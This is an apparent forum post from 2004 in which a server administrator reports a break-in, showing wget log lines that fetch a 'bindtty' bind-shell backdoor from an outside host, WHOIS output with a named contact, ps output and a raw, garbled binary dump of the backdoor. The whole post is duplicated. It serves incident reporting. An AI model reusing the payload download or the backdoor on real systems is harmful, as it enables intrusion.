Xhost
07-05-2004, 08:22 AM
This showed up in the logs of one of my servers!:angry:
--01:24:39-- http://raky.home.cosmic-cp/
=> `index.html.1'
Resolving raky.home.cosmic-cp... failed: Host not found.
--01:26:41-- http://raky.home.cosmic-cow.net/bindtty
=> `bindtty'
Resolving raky.home.cosmic-cow.net... done.
Connecting to raky.home.cosmic-cow.net[69.31.32.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,637 [text/plain]
0K .......... .. 100% 108.25 KB/s
01:26:47 (108.25 KB/s) - `bindtty' saved [12637/12637]
Search results for: ! NET-69-31-32-0-1
OrgName: Quantum Tech Pty Ltd
OrgID: QTPL
Address: P.O. Box 6111
Address: Girrawheen
City: Perth
StateProv: WA
PostalCode: 6064
Country: AU
NetRange: 69.31.32.0 - 69.31.39.255
CIDR: 69.31.32.0/21
NetName: NLYR-69-31-32-0-1
NetHandle: NET-69-31-32-0-1
Parent: NET-69-31-0-0-1
NetType: Reallocated
NameServer: NS1.QUANTUM-TECH.COM
NameServer: NS2.QUANTUM-TECH.COM
Comment:
RegDate: 2003-04-12
Updated: 2003-04-12
OrgTechHandle: MVA6-ARIN
OrgTechName: Van Essen, Mike
OrgTechPhone: +61 8 9343 0428
OrgTechEmail: mike@quantumtech.net.au
# ARIN WHOIS database, last updated 2004-07-04 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Called this number and they are saying that they do not know any mike or quantumtech.
PS -aux
---------------------------------------------------------------------------------
xxxxx 15978 0.0 0.0 1484 4 ? S Jul01 0:00 ./bindtty
xxxxx 14456 0.0 0.0 2380 48 ? S Jul01 0:00 SCREEN
xxxxx 14457 0.0 0.0 2204 52 pts/0 S Jul01 0:00 /bin/sh
xxxxx 14463 0.0 0.0 1404 8 pts/0 S Jul01 0:00 ./suck
xxxxx 14464 0.0 0.0 1384 4 pts/0 S Jul01 0:00 ./suck
------------------------------------------------------------------------------------
Anyone seen this before?
Pulling up http://raky.home.cosmic-cow.net/bindtty
Gives the following:
ELF 4 4 ( 4 44
X X X XX| d
dd /lib/ld-linux.so.2 GNU
% % # !
$
" k h| xq 5
Z O H ȇ ؇ ' g
d x 9 (. 86 ԧ
H { X6 h \ x: < :
9 v 9 . Ȉ' ؈| V 6
< _ q (: 84 A H9
X| h0 libc.so.6 strcpy waitpid ioctl stdout execve memcpy
perror dup2 socket select fflush bzero setpgid accept write kill bind chdir memchr signal read
htonl listen fork sprintf htons exit _IO_stdin_used __libc_start_main strlen open vhangup setsid
close __gmon_start__ GLIBC_2.0
ii
Ч# ԧ L P T X \
` d h l p
t x |
_
ħ! ȧ" ̧$ UY
5D%H %Lh %Ph
%Th %Xh %\h _%`h( %dh0 %hh8
p%lh@ `%phH P%thP @%xhX 0%|h` %hh
%hp %hx %h %h %h %h
%h_ _%_h %h %h p%h `%h
P%h @%h 0%h %h %ħh %ȧh
%̧h 1^PTRhhQVhhUS [Ó P
tЋ]ÐU=ا u-`t
`ҡ`uاÉU<t
t$<u]UhEءEܡEࡰEE衵EEE
EŕEȋE$EED$E$EUED(؈EEPED(EE
U( D$ $ƕ$YDž ~
D$D$Е$D$ $hEE8
y`D$D$ٕ$D$ $!EE8 yE $Dž
;Dž UD$ $ D$ D$
$UD$ $ D$ $ UWt )D$ D$
$ Eă} y$Džw D$ E؉$fE $ E$
(fED$ E؉D$Eĉ$y$jDžw D$
Eĉ$y$8Džw h $=ԧ$@E}
t"ED$$Džw {$D$ $ED$
E$D$ E$D$ E$E$dD$ $ D$ $
lE ED$EȉD$Eĉ$E} y,E} > Dž%Dž(Dž
x{D$D$+x$wDžy D$
yyD$E$dyyyy{y y (y
~yU- 8
vyDŽ{ D$ $ ED$E$b
3w7w;w?wCwGfww$D$wD$
E$hE$m$ |E} E$DD$T
E$E$!Eĉ$D$ $ 2D$ $ D$ E$D$
E$D$
E$E${D$D$$IE$D$8$ D$8$
(ȉwwEE(EE(D$
D$ D$ (D$E;E~E@w
UBww$
y
EE(tYD$ (D$E$Www U
wD$(D$E$4- EE((wD$
(D$E$ww (wT$D$ $=ww u
(w)Љw)Љww~
Džw wD$wD$w$w*
+wD$wwD$E$fDžw fDžw
wfwfwwfwfwwD$D$T E$OD$ $
[(w)ЉD$(D$E$t(w+www
wD$wD$E$*wD$wD$E$E$E
ĉ$E$D$ D$ E$$
AE$uw}ÐUVS1TX-X9sƐXC9r[^]UX
-X]Xu]]H XKu吐US,,tv '
ЋuX[]US [÷ R:] pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx
/dev/pty /dev/tty socket bind listen Daemon is starting... OK, pid = %d
/ /dev/null sh -i
HOME=%s Can't fork pty, bye!
/bin/sh 8 @
(
X
@ 8 (
oo o d
n~·އ.>N^n~Έވ
.>N^n GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3,
propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3
20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4
3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC:
(GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo
Linux 1.4 3.2.3-r3, propolice) , @ " $ _
U
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6 %
% Y
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crti.S 2,Wd
@",: ,Wdd,,-: Y
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crtn.S :
U .symtab .strtab .shstrtab .interp .note.ABI-tag .hash .dynsym .dynstr
.gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame .data .dynamic
.ctors .dtors .jcr .got .bss .comment .debug_aranges .debug_info .debug_abbrev .debug_line
#
1 (( 0 7 XX P
? G o J T o
c (( l 88
u @@ p XX
{
TT XX
dd ,,
44 << @@
ԧ
X @ @
` *
h" R H+
( X
( 8 @
X
T X d ,
4 < @ ԧ
T _ j
_ _
T _ F
T
Q a l , z 4 T <
` ا Љ a 0
8 T < P $
F $ T
$ j t d h| 80
xq 8 Z
X ȇ , ؇ = \ J 8
Z g l ~ x @
9 (.
86 ԧ H X6
h % 8 - X @ 0 P ԧ \ hj
a x: t X : X 9
9
Ȉ' ؈| 6
( ԧ / @ E ܧ J < [ l X
_ (: 84 X H9
X| h0 <command line>
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/config.h <built-in> abi-note.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/abi-tag.h init.c
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/defs.h initfini.c call_gmon_start
crtstuff.c __CTOR_LIST__ __DTOR_LIST__ __EH_FRAME_BEGIN__ __JCR_LIST__ p.0 completed.1
__do_global_dtors_aux frame_dummy __CTOR_END__ __DTOR_END__ __FRAME_END__ __JCR_END__
__do_global_ctors_aux /var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S
bindtty.c elf-init.c _DYNAMIC write@@GLIBC_2.0 hangout close@@GLIBC_2.0 sig_child _fp_hw
perror@@GLIBC_2.0 fork@@GLIBC_2.0 signal@@GLIBC_2.0 fflush@@GLIBC_2.0 __fini_array_end
select@@GLIBC_2.0 htonl@@GLIBC_2.0 __dso_handle __libc_csu_fini execve@@GLIBC_2.0
memchr@@GLIBC_2.0 accept@@GLIBC_2.0 _init listen@@GLIBC_2.0 setsid@@GLIBC_2.0 vhangup@@GLIBC_2.0
stdout@@GLIBC_2.0 waitpid@@GLIBC_2.0 open_tty _start chdir@@GLIBC_2.0 strlen@@GLIBC_2.0 get_tty
__fini_array_start __libc_csu_init __bss_start main setpgid@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0 __init_array_end dup2@@GLIBC_2.0 data_start printf@@GLIBC_2.0
bind@@GLIBC_2.0 _fini memcpy@@GLIBC_2.0 open@@GLIBC_2.0 bzero@@GLIBC_2.0 exit@@GLIBC_2.0 _edata
_GLOBAL_OFFSET_TABLE_ _end ioctl@@GLIBC_2.0 htons@@GLIBC_2.0 __init_array_start _IO_stdin_used
kill@@GLIBC_2.0 sprintf@@GLIBC_2.0 __data_start socket@@GLIBC_2.0 _Jv_RegisterClasses
read@@GLIBC_2.0 __gmon_start__ strcpy@@GLIBC_2.0
Holy??:angry: I don't like the looks of this..
--01:24:39-- http://raky.home.cosmic-cp/
=> `index.html.1'
Resolving raky.home.cosmic-cp... failed: Host not found.
--01:26:41-- http://raky.home.cosmic-cow.net/bindtty
=> `bindtty'
Resolving raky.home.cosmic-cow.net... done.
Connecting to raky.home.cosmic-cow.net[69.31.32.153]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,637 [text/plain]
0K .......... .. 100% 108.25 KB/s
01:26:47 (108.25 KB/s) - `bindtty' saved [12637/12637]
Search results for: ! NET-69-31-32-0-1
OrgName: Quantum Tech Pty Ltd
OrgID: QTPL
Address: P.O. Box 6111
Address: Girrawheen
City: Perth
StateProv: WA
PostalCode: 6064
Country: AU
NetRange: 69.31.32.0 - 69.31.39.255
CIDR: 69.31.32.0/21
NetName: NLYR-69-31-32-0-1
NetHandle: NET-69-31-32-0-1
Parent: NET-69-31-0-0-1
NetType: Reallocated
NameServer: NS1.QUANTUM-TECH.COM
NameServer: NS2.QUANTUM-TECH.COM
Comment:
RegDate: 2003-04-12
Updated: 2003-04-12
OrgTechHandle: MVA6-ARIN
OrgTechName: Van Essen, Mike
OrgTechPhone: +61 8 9343 0428
OrgTechEmail: mike@quantumtech.net.au
# ARIN WHOIS database, last updated 2004-07-04 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Called this number and they are saying that they do not know any mike or quantumtech.
PS -aux
---------------------------------------------------------------------------------
xxxxx 15978 0.0 0.0 1484 4 ? S Jul01 0:00 ./bindtty
xxxxx 14456 0.0 0.0 2380 48 ? S Jul01 0:00 SCREEN
xxxxx 14457 0.0 0.0 2204 52 pts/0 S Jul01 0:00 /bin/sh
xxxxx 14463 0.0 0.0 1404 8 pts/0 S Jul01 0:00 ./suck
xxxxx 14464 0.0 0.0 1384 4 pts/0 S Jul01 0:00 ./suck
------------------------------------------------------------------------------------
Anyone seen this before?
Pulling up http://raky.home.cosmic-cow.net/bindtty
Gives the following:
ELF 4 4 ( 4 44
X X X XX| d
dd /lib/ld-linux.so.2 GNU
% % # !
$
" k h| xq 5
Z O H ȇ ؇ ' g
d x 9 (. 86 ԧ
H { X6 h \ x: < :
9 v 9 . Ȉ' ؈| V 6
< _ q (: 84 A H9
X| h0 libc.so.6 strcpy waitpid ioctl stdout execve memcpy
perror dup2 socket select fflush bzero setpgid accept write kill bind chdir memchr signal read
htonl listen fork sprintf htons exit _IO_stdin_used __libc_start_main strlen open vhangup setsid
close __gmon_start__ GLIBC_2.0
ii
Ч# ԧ L P T X \
` d h l p
t x |
_
ħ! ȧ" ̧$ UY
5D%H %Lh %Ph
%Th %Xh %\h _%`h( %dh0 %hh8
p%lh@ `%phH P%thP @%xhX 0%|h` %hh
%hp %hx %h %h %h %h
%h_ _%_h %h %h p%h `%h
P%h @%h 0%h %h %ħh %ȧh
%̧h 1^PTRhhQVhhUS [Ó P
tЋ]ÐU=ا u-`t
`ҡ`uاÉU<t
t$<u]UhEءEܡEࡰEE衵EEE
EŕEȋE$EED$E$EUED(؈EEPED(EE
U( D$ $ƕ$YDž ~
D$D$Е$D$ $hEE8
y`D$D$ٕ$D$ $!EE8 yE $Dž
;Dž UD$ $ D$ D$
$UD$ $ D$ $ UWt )D$ D$
$ Eă} y$Džw D$ E؉$fE $ E$
(fED$ E؉D$Eĉ$y$jDžw D$
Eĉ$y$8Džw h $=ԧ$@E}
t"ED$$Džw {$D$ $ED$
E$D$ E$D$ E$E$dD$ $ D$ $
lE ED$EȉD$Eĉ$E} y,E} > Dž%Dž(Dž
x{D$D$+x$wDžy D$
yyD$E$dyyyy{y y (y
~yU- 8
vyDŽ{ D$ $ ED$E$b
3w7w;w?wCwGfww$D$wD$
E$hE$m$ |E} E$DD$T
E$E$!Eĉ$D$ $ 2D$ $ D$ E$D$
E$D$
E$E${D$D$$IE$D$8$ D$8$
(ȉwwEE(EE(D$
D$ D$ (D$E;E~E@w
UBww$
y
EE(tYD$ (D$E$Www U
wD$(D$E$4- EE((wD$
(D$E$ww (wT$D$ $=ww u
(w)Љw)Љww~
Džw wD$wD$w$w*
+wD$wwD$E$fDžw fDžw
wfwfwwfwfwwD$D$T E$OD$ $
[(w)ЉD$(D$E$t(w+www
wD$wD$E$*wD$wD$E$E$E
ĉ$E$D$ D$ E$$
AE$uw}ÐUVS1TX-X9sƐXC9r[^]UX
-X]Xu]]H XKu吐US,,tv '
ЋuX[]US [÷ R:] pqrstuvwxyzabcde 0123456789abcdef /dev/ptmx
/dev/pty /dev/tty socket bind listen Daemon is starting... OK, pid = %d
/ /dev/null sh -i
HOME=%s Can't fork pty, bye!
/bin/sh 8 @
(
X
@ 8 (
oo o d
n~·އ.>N^n~Έވ
.>N^n GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3,
propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3
20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4
3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC:
(GNU) 3.2.3 20030422 (Gentoo Linux 1.4 3.2.3-r3, propolice) GCC: (GNU) 3.2.3 20030422 (Gentoo
Linux 1.4 3.2.3-r3, propolice) , @ " $ _
U
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/csu GNU AS 2.14.90.0.6 %
% Y
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crti.S 2,Wd
@",: ,Wdd,,-: Y
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu crtn.S :
U .symtab .strtab .shstrtab .interp .note.ABI-tag .hash .dynsym .dynstr
.gnu.version .gnu.version_r .rel.dyn .rel.plt .init .text .fini .rodata .eh_frame .data .dynamic
.ctors .dtors .jcr .got .bss .comment .debug_aranges .debug_info .debug_abbrev .debug_line
#
1 (( 0 7 XX P
? G o J T o
c (( l 88
u @@ p XX
{
TT XX
dd ,,
44 << @@
ԧ
X @ @
` *
h" R H+
( X
( 8 @
X
T X d ,
4 < @ ԧ
T _ j
_ _
T _ F
T
Q a l , z 4 T <
` ا Љ a 0
8 T < P $
F $ T
$ j t d h| 80
xq 8 Z
X ȇ , ؇ = \ J 8
Z g l ~ x @
9 (.
86 ԧ H X6
h % 8 - X @ 0 P ԧ \ hj
a x: t X : X 9
9
Ȉ' ؈| 6
( ԧ / @ E ܧ J < [ l X
_ (: 84 X H9
X| h0 <command line>
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/config.h <built-in> abi-note.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/abi-tag.h init.c
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crti.S
/var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/defs.h initfini.c call_gmon_start
crtstuff.c __CTOR_LIST__ __DTOR_LIST__ __EH_FRAME_BEGIN__ __JCR_LIST__ p.0 completed.1
__do_global_dtors_aux frame_dummy __CTOR_END__ __DTOR_END__ __FRAME_END__ __JCR_END__
__do_global_ctors_aux /var/tmp/portage/glibc-2.3.2-r3/work/glibc-2.3.2/buildhere/csu/crtn.S
bindtty.c elf-init.c _DYNAMIC write@@GLIBC_2.0 hangout close@@GLIBC_2.0 sig_child _fp_hw
perror@@GLIBC_2.0 fork@@GLIBC_2.0 signal@@GLIBC_2.0 fflush@@GLIBC_2.0 __fini_array_end
select@@GLIBC_2.0 htonl@@GLIBC_2.0 __dso_handle __libc_csu_fini execve@@GLIBC_2.0
memchr@@GLIBC_2.0 accept@@GLIBC_2.0 _init listen@@GLIBC_2.0 setsid@@GLIBC_2.0 vhangup@@GLIBC_2.0
stdout@@GLIBC_2.0 waitpid@@GLIBC_2.0 open_tty _start chdir@@GLIBC_2.0 strlen@@GLIBC_2.0 get_tty
__fini_array_start __libc_csu_init __bss_start main setpgid@@GLIBC_2.0
__libc_start_main@@GLIBC_2.0 __init_array_end dup2@@GLIBC_2.0 data_start printf@@GLIBC_2.0
bind@@GLIBC_2.0 _fini memcpy@@GLIBC_2.0 open@@GLIBC_2.0 bzero@@GLIBC_2.0 exit@@GLIBC_2.0 _edata
_GLOBAL_OFFSET_TABLE_ _end ioctl@@GLIBC_2.0 htons@@GLIBC_2.0 __init_array_start _IO_stdin_used
kill@@GLIBC_2.0 sprintf@@GLIBC_2.0 __data_start socket@@GLIBC_2.0 _Jv_RegisterClasses
read@@GLIBC_2.0 __gmon_start__ strcpy@@GLIBC_2.0
Holy??:angry: I don't like the looks of this..
